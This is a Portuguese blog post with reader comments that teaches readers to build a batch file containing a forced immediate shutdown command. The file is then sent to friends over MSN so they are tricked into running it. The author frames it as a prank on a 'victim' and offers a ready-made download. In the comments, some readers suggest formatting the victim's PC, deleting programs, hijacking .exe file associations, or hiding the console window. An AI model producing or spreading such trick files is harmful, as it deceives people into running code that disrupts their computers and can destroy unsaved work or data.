Desligue o PC de seus amigos!

3 de março de 2008

Uma das coisas mais fúteis, mais muito engraçadas de se fazer quando você tem um tempo sobrando é ficar jogando conversa fora em MSN… Nessas conversas que tal você enganar seus amigos “vítima” e desligar o PC dele? Eu já consegui fazer uma colega minha desligar o PC 5 vezes… Que tal você aprender? É com um simples arquivo em bat. Confiram!😀


Antes de mais nada se você não quer ter o trabalho de criar o .bat em seu PC basta clicar aqui e fazer o download, mais para quem quer aprender só seguir minha dica abaixo…

Aba o bloco de notas e digite “shutdown -s -f -t 0” (sem aspas), agora só salvar com nome de sua preferência mais no fim coloque .bat, para que o arquivo salve na mesma extensão…
Agora é só se divertir! Mande para seus amigos e faça-o de boboca!😛

Quando seu amigo for abrir aparacerá rapidamente uma janela do CMD do Windows, e rapidamente o PC da vítima será desligado!👿


Dica feita por mim, Diego

14 Responses to “Desligue o PC de seus amigos!”

  1. YuriPC Says:

    essa dica ai ta muuuito simples

    tem que ser muito otário pra abri um arquivo com aquela icone do .bat

    e esse código tambem é muito bonzinho
    é mais legal desconfigurar algumas paradas, deletar alguns programas ou formatar o pc dele:mrgreen:

  2. Filipe Says:

    Ow maldade isso mano, num pode, mancada… mas que é hilario é😀

  3. Revigoe Says:

    Dá pra fazer isso no executar também.
    Ja vi gente que caiu!!👿

  4. YuriPC Says:

    tem um comando bem massa que o cara toda vez que for abrir um .exe, ele vai abrir pelo bloco de notas.

  5. Kaio Wentz_ Says:

    Oi Diego!
    Primeiro de tudo quero q vc saiba q sou fã do seu site
    e fiquei muito triste quando você disse q não iria mas postar😦
    mas agora to feliz e quero publicar seu site no meu blog.
    posso?
    xau

  6. Diego Says:

    Nossa Kaio, se você publicar ficarei muito feliz, muito obrigado, muito obrigado mesmo! Me passe o link de seu blog para eu adicioná-lo nos parceiros!😛

  7. Kaio Wentz_ Says:

    Olha ai meu blog:
    http://www.kaiowentz.blogspot.com/🙂
    Ficarei Honrado!

  8. DeskWin Ajuda Says:

    H2O de volta, uhul!

    Cara, essa dica não erá tão simples, até o dia que nós apredemos a fazer ela, não é verdade?

    Cara, eu fui fazer isso uma vez, o CDM do meu Vista não parava de abrir e fechar sozinho.

  9. diego^SCFC Says:

    Legal… mas quem cai nessa de receber arquivo .bat já merece ser zoado mesmo😀

  10. liverig Says:

    Pra não saber que .BAT é um arquivo do MS-DOS (Command) tem que ser muito leigo.

    Como disse o diego~SCFC, merece ser zoado.

    Oferecimento…. Blog do Dissidente
    http://liverig.wordpress.com


  11. […] H2O DeskMod 2008 Autor do Post: Paulo Agostinho / 12 […]

  12. Luis Says:

    Diego nao consegui, diz que ese arquivo pode ser muinto peligroso. y da um erro a enviar ajuda!!

  13. Seu Madruga Says:

    Tem gente que cai, né, fazer o que ?!

  14. internetdegraca Says:

    tambem da para ocultar para n aparecer o cmd
    e so colocar @echo-off ou alguma coisa assim^^


Deixe uma resposta

